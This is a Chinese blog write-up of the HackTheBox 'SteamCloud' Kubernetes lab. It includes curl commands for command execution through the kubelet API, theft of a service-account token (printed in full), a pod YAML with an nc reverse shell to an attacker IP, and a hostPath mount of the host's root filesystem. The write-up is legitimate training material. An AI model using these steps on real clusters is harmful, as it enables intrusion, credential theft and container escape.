HackTheBox | SteamCloud

最新推荐文章于 2024-02-04 17:45:08 发布
最新推荐文章于 2024-02-04 17:45:08 发布
阅读量235 收藏
点赞数
分类专栏: htb记录 文章标签: kubernetes 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Purpose_7/article/details/128690556
版权

HackTheBox | SteamCloud

nmap扫描,开放22、8443

image-20230112181231235

访问8443端口,提示forbidden

image-20230112181632541

尝试全端口扫描,开放22、2379、2380、8443、10249、10250、10256端口

image-20230112190233173

image-20230112190244753

转向etcd这个服务,简单查了一下,可以理解为分布式数据库,并且特征端口也符合

image-20230112232758436

在文章https://blog.pentesteracademy.com/premium-lab-etcd-keys-api-information-gathering-a8de57cbdc94提到了msf中针对etcd的探测模块

image-20230112234009533

但是我的MSF出问题了

此外,在博客《The Security Footgun in etcd》https://elweb.co/the-security-footgun-in-etcd/提到了etcd的未授权访问导致的信息泄露问题,访问目标端口的v2/keys/?recursive=true,能够获取到一些键值对。但是在目标靶机中失败

image-20230113085911240

继续看其他的端口,10250是Kubelet的API端口,在找Kubelet的资料的时候,发现etcd是集群中的一部分,所以这个目标应该是Kubernetes

《kubernetes集群渗透测试》https://www.freebuf.com/vuls/196993.html

image-20230113084051066

在kubernetes中,Master节点中的kube-apiserver可能存在未授权访问问题,比如在上述文章中提到了pods路径可以获取到环境变量、运行的容器信息、命名空间等信息。在目标靶机中也成功获取到了这些信息。

image-20230113090154392

此外,还有services、replicationcontrollers等路径。

利用pods路径,在当前集群中获取到以下pod

pod name: storage-provisioner			namespace: kube-system	container-name: storage-provisioner
pod name: kube-proxy-7fmzp				namespace: kube-system	container-name: kube-proxy
pod name: coredns-78fcd69978-vl4w7		namespace: kube-system	container-name: coredns
pod name: nginx							namespace: default		container-name: nginx
pod name: etcd-steamcloud				namespace: kube-system	container-name: etcd
pod name: kube-apiserver-steamcloud		namespace: kube-system	container-name: kube-apiserver
pod name: kube-controller-manager-steamcloud		namespace: kube-system	container-name: kube-controller-manager
pod name: kube-scheduler-steamcloud		namespace: kube-system	container-name: kube-scheduler

按照https://github.com/kayrus/kubelet-exploit提到的方法,对pod挨个尝试,最终在nginx中成功命令执行

curl -k -XPOST "https://10.10.11.133:10250/run/default/nginx/nginx?" -d "cmd=ls -la /"

image-20230113112002343

在当前容器的/root目录下找到user.txt

根据文章《Kubelet Exploit》https://cloudsecdocs.com/container_security/offensive/attacks/techniques/kubelet_exploit/#get-access-to-the-api-server进行攻击

在env中没有看到有效信息

image-20230113134604837

获取ServiceAccountToken

curl -k -XPOST "https://10.10.11.133:10250/run/default/nginx/nginx?" -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token"

image-20230114190925430

按照博客中的内容,就可以对目标集群的master节点进行访问了,但是当前靶机没有开放6443端口,尝试之前获取到的8443端口

curl -ks -H "Authorization: Bearer eyJhbGciOiJSUzI1NiIsImtpZCI6Ik5wZXhscTlvUkNYTFctYmlCc2hhNGIxOWI5ZWY5ZWVLWWx4Zi1yaVkwLTgifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzA1MjI5ODIyLCJpYXQiOjE2NzM2OTM4MjIsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJuZ2lueCIsInVpZCI6IjViNThkNzc5LWNhNGMtNGNhNi1iYzYwLWZlMjhmNWIyOTI2YSJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZGVmYXVsdCIsInVpZCI6ImE0NDUzYmE2LWE1NzQtNDE5My04NWFjLTQ2Y2I5NjAyMDBiYSJ9LCJ3YXJuYWZ0ZXIiOjE2NzM2OTc0Mjl9LCJuYmYiOjE2NzM2OTM4MjIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.G47YNKozzqCepS8W8n7e-IKcOAFzqI2Z5l8ifqnHhZUxpiB3W3cq8tY7Q_RXUrDCiuP72xOWMqy_44VIGprfu64irmYgKyg-7nbtbo5Nql_1t9X_w9M8BE91tExLhdJmnHjyl96Uz8A0rrUmcmBotJvW0Sl_MoRwrREcjuHpW6XvRwg9ZmW9iJc9Lt3cdWhnRcDdYXkzPMQ2DT3YVxdFdKxI3WfaXb7HhLmanCDb9z06pNpe1jBQf0df6xqJBcEr9nJnmzx0hoYyQ_86hWkd3XF0rHamsecSnTAfHdTZpE4SmakBeQV4WGFTl3zHtnk83cS4wNhjetNtpcco3GaiOg" https://10.10.11.133:8443/api/v1/namespaces/default/secrets

提示用户没有权限

image-20230114190950862

下载kubectl操作,https://storage.googleapis.com/kubernetes-release/release/v1.26.0/bin/windows/amd64/kubectl.exe

获取所有pod节点,存在资源对象nginx

image-20230114221534652

get all也只能获取到nginx这个pod的信息

image-20230114221831248

对获取到的token进行鉴权查询

image-20230114222150656

在默认的namespace里,可以进行get|create|list操作,尝试直接部署一个busybox的反弹shell,发现没办法pull镜像

apiVersion: v1
kind: Pod
metadata:
  name: newpod
  namespace: default 
spec:
  containers:
    - name: busybox
      image: busybox:1.29.2
      command: ["/bin/sh"]
      args: ["-c", "nc 10.10.16.7 1234 -e /bin/sh"]
      volumeMounts:
      - name: host
        mountPath: /host
  volumes:
    - name: host
      hostPath:
        # directory location on host
        path: /
      # type: Directory

image-20230114224219959

image-20230114224149861

使用原本的nginx镜像进行反弹shell。在最开始访问10250端口的pods路径的时候,可以获取到nginx镜像为nginx:1.14.2,但是部署也报了error。

image-20230114224401865

image-20230114224621853

参考wp,进行文件系统挂载,感觉和docker逃逸中的方法有点类似。将宿主机的/根目录挂载到/host路径下,容器创建成功。

apiVersion: v1
kind: Pod
metadata:
  name: newpod2
  namespace: default 
spec:
  containers:
    - name: nginx
      image: nginx:1.14.2
      volumeMounts:
      - name: host
        mountPath: /host
  volumes:
    - name: host
      hostPath:
        # directory location on host
        path: /
      # type: Directory

image-20230114224932980

成功访问到主机的文件系统image-20230114225346510

过程中get了工具kubeletctl,https://github.com/cyberark/kubeletctl,功能和curl命令差不多,但是使用起来更方便

尝试了一下写文件,写不进去,对命令进行编码也是一样的效果,所以只能读取宿主机文件系统中的文件,但是是root权限,也能够获取到很多信息。

image-20230114230302330

xxL7-
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hackthebox注册教程
01-20
官方网址:https://www.hackthebox.eu/ hackthebox是一个靶场,听说和vulnhub很像,最近迷上了做靶场,于是就像去hackthebox看看,发现还是注册,而且注册好像还没有那么简单 在首页的最下面有个join,进行点击 发现...
HackTheBox | Driver
Purpose_7的博客
10-11 720
HackTheBox | Driver
HackTheBox | Horizontall
Purpose_7的博客
08-08 941
HackTheBox Horizontall
HackTheBox】 meow
开心星人的博客
06-23 843
选择tcp,稳定一点然后下载starting_point_HappyCoder.ovpn复制到kali中去切换root用户使用命令 到这样就是可以了再打开一个terminal 看到了我们的tun0隧道已经建立好了 ping下这台主机,是可以ping通的 1、缩写VM代表着什么 Virtual Machine2、我们使用什么工具和操作系统进行交互为了通过命令行执行命令,例如启动我们的VPN连接,它也被称作控制台或shell terminal(终端)3、我们使用什么服务形成我们的VPN连接进入我们
Hack The Box——ScriptKiddie
江左盟的博客
02-15 1万+
简介 信息收集 使用nmap扫描目标主机端口及服务信息,发现5000端口运行着Werkzeug httpd 0.16.1 (Python 3.8.5)服务,操作系统为Ubuntu,如图: 访问5000端口发现是简单的黑客工具页面,如图: 使用Google搜索发现Werkzeug Debug Shell远程代码执行漏洞,但是该靶机并不适用。使用该页面的nmap扫描127.0.0.1,发现目标主机运行Nmap 7.80版本,如图: 使用Google和exploit-db搜索该版本漏洞.
Hack The Box-Skyfall
最新发布
m0_52742680的博客
02-04 1999
HackTheBox季节性靶场第五篇
入坑 Hack The Box
LainWith的博客
10-19 9279
视频介绍:https://www.bilibili.com/video/BV17T4y1i7Uh 官方文档:https://help.hackthebox.com/en/articles/5185158-introduction-to-hack-the-box个人感觉前者偏向实战一些,后者偏向练习题一些。更详细的区别,参见: https://hacktalk.net/hacking-the-box-htb-vs-vulnhub/过去注册HTB的时候,需要拿到邀请码才行,类似下面视频这种,但是现在你不需要邀请
Hackthebox入门
热门推荐
DTSknanLP的博客
02-28 2万+
Hackthebox-Paper
连接Hack The Box靶场教程
Atopos545的博客
01-24 657
进去后选好节点,随便选一个就行。免费的就是下载对方vpn并连接,付费的就直接开启一个Pwnbox,我就用的是免费的,这里只介绍免费的方法。下好后把文件放到kali虚拟机里面,创建一个文件放进去就可以了,或者放桌面都行,就看你启动的时候方不方便。之后在终端启动openvpn,就刚才放进kali的文件。新手都是从Starting Point开始的,这里就以这个为例,其他的复刻一下这个步骤就好了。这三种分别对应左边的三种靶机,你要打那个靶机就去开启那个靶机对应的vpn。这样就可以尽情的去打靶,去渗透了!
hack the box lame渗透过程
nini_boom的博客
05-12 1672
hack the box就不多介绍了。直接上题 1、信息收集 端口扫描 nmap -Pn -sV -sC -A -oN 10.10.10.3.txt 10.10.10.3 参数 作用 -Pn 如果主机禁用了ping请求,那么扫描将不能很好地进行下去。-Pn就是默认主机已经启动,并进行全套的检查工作 -sV 检查服务端的软件版本,可针对不同版本选择payload -sC...
HackTheBox靶机系列之困难Reel
04-09
主要介绍Reel靶机得整个利用过程
keys.zip (hackthebox)
12-05
hackthebox Can you decrypt the message? Zip password: hackthebox
HackTheBox:Hack The Box笔测试和挑战
03-08
哈克盒子Hack The Box笔测试和来自挑战在这里,我们有Hack The Box的演练。
hackthebox:hackthebox.eu工作库
03-10
所有练习和包装盒。 欣赏:3 在CWD中工作,并在flag/标记(奖赏)。
hackthebox
03-27
hackthebox
HackTheBox:只是我在做HackTheBox时的个人记录
04-03
哈克盒子按HTB难度等级和顺序排序机器简单 :端口445 Netbios Samba用户名映射脚本命令执行:MS08_067 NetAPI远程执行代码漏洞:通过FTP上传的ASPX反向Shell(IIS) :端口443 VTigerCRM(Elastix)本地文件包含LFI...
HackTheBox:破解盒子的挑战
03-09
HackTheBox:破解盒子的挑战
hackthebox-writeups:HacktheBox'boot2root'计算机的编写
05-12
hackthebox撰写HacktheBox计算机(boot2root)的文章和用西班牙语或英语编写的挑战。有关密码保护的重要说明直到2020年3月的机器写入都受到相应的根标志的保护。 但是自此日期以来,HTB标志是动态的,并且对于每个...
hackthebox注册
05-10
如果您想注册HackTheBox,请按照以下步骤操作: 1. 访问HackTheBox网站:https://www.hackthebox.eu/ ... 3. 输入您的电子邮件地址并创建一个帐户。...您可以通过在HackTheBox的论坛上积极参与社区来获得邀请码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值